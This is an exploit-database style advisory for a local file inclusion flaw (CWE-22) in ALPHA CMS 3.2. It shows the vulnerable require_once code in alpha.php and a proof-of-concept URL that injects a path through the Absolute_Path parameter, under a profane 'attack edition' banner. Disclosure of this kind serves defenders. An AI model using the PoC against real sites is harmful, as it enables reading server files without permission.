########################################################
fucking the Web Apps [attack edition]
/\ `\ /\ \ __ /\ \__/\ \
\ \ \L\\__ __ \ \ \/'\ /\\ ___ __ \ \ ,\ \ \__ __
\ \ \/\ \/\ \ /'\ \ , < \/\ \ /' _ `\ /' `\ \ \ \/\ \ _ `\ /'`\
\ \ \/\ \ \_\ \/\ \/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \\ \ \ \ \/\ __/
\ \\ \ \/\ \\\ \\ \\ \\ \\ \\ \___ \ \ \\\ \\ \\ \\
\// \// \// \//\//\//\//\//\/L\ \ \// \//\//\//
/\/
\_//
__ __ __ ______ Hack0wn! Security Project
/\ \ /\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ \ \ \ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'`\ \ '`\ \ \ __ \/\ '`\/\ '`\ /',\
\ \ \/ \\ \/\ /\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\, `\
\ `\x/\ \___\\ \,/ \ \\ \\ \ ,/\ \ ,/\/\____/
'\//// \// \// \//\//\ \ \/ \ \ \/ \//
\ \\ \ \\
\// \/_/
[+]Title : ALPHA CMS Local File Inclusion Vulnerability
[+]Version: 3.2
[+]Download: http://sourceforge.net/projects/alpha-cms/files/
[+]Author: eidelweiss
[+]Metode: Local File Inclusion
[+]CWE: 22
[*]Special to Syabilla_putri (I miss u so much to)[*]
[!]Thank`s Fly To:
[~] Jose Luis Gongora Fernandez a.k.a JosS - sp3x (securityreason)
[~] exploit-db team (loneferret - Exploits - dookie2000ca)
[~] Inj3ct0r.com r0073r & 0x1D [Inj3ct0r Exploit Database] - [D]eal [C]yber
########################################################
Description:
ALPHA CMS is an A.P.I - free (Open Archiecture), MVC based Content Management System.
ALPHA CMS architecture gives the ability to easily create advanced web pages, add-ons or even other CMS.
ALPHA CMS is based on PHP, Smarty, JavaScript and MySQL.
-=[ Vuln C0de ]=-
[!] File name: alpha.php
// Create a new ALPHA CMS object
$alpha = new ALPHA;
// Include DTBS class
require_once($alpha->Absolute_Path() . 'db.php');
// Include CTRL class
require_once($alpha->Absolute_Path() . 'controler.php');
// Include UTL class
require_once($alpha->Absolute_Path() . 'utilities.php');
// Include STY class
require_once($alpha->Absolute_Path() . 'smarty.php');
-=[ Proof Of Concept ]=-
http://127.0.0.1/alpha.php?Absolute_Path=[LFI]
######################=[E0F]=#############################